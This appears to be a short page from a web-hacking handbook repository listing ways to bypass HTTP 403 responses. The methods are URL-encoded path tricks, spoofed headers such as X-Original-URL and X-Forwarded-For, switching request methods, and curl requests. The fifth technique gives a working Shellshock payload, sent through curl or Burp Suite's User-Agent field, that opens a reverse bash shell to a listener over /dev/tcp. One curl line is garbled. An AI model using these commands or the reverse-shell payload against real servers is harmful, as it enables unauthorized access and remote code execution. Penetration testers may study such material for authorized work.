handbook/tools/3.Web-Hacking/1.Brute-Force/1.Web-proxy/BurpSuite/Bypass/403-Bypass.md

34 lines
1.2 KiB
Markdown
Raw Normal View History

2024-08-30 23:07:22 +00:00
## How to bypass 403 Errors
**Technique number 1**
- Appending `{%2e} or {%2f} { **/*, /./}` after the first slash
- https://www.domain/DB = 403
- https://www.domain/%2e/DB] =200
- https://www.domain/./DB] =200
**Technique number 2**
- Adding headers to requests module.
- Content-Length: 0
- X-rewrite-url
- X-Original-URL
- X-Custom-IP-Authorization
- X-Forwarded-For
**Technique number 3**
- Change the request method
- GET → POST
- GET → TRACE
- GET → PUT
- GET **→** OPTIONS
**Technique number 4**
- Using Curl
- curl -i -s -k -X $GET -H $Host: account.domain.com -H $X-rewrite-url: admin/login $https://account.domain.com/'
**Technique number 5**
- Brute force sub directory from the 403 directory
- Try using (wordlist/dirb/comon.txt)
- Setup Netcat lisener
- Inject parameters from Curl or Burp Suite
- CURL ---> curl -A “() { :; }; /bin/bash -i > /dev/tcp/192.168.2.13/9000 0<&1 2>&1” http://192.168.2.18/cgi-bin/helloworld.cgi
- Burp Suite ---> Change User-Agent: () { :; }; /bin/bash -i > /dev/tcp/192.168.2.13/9000 0<&1 2>&1
- More info ---> https://hackbotone.com/shellshock-attack-on-a-remote-web-server-d9124f4a0af3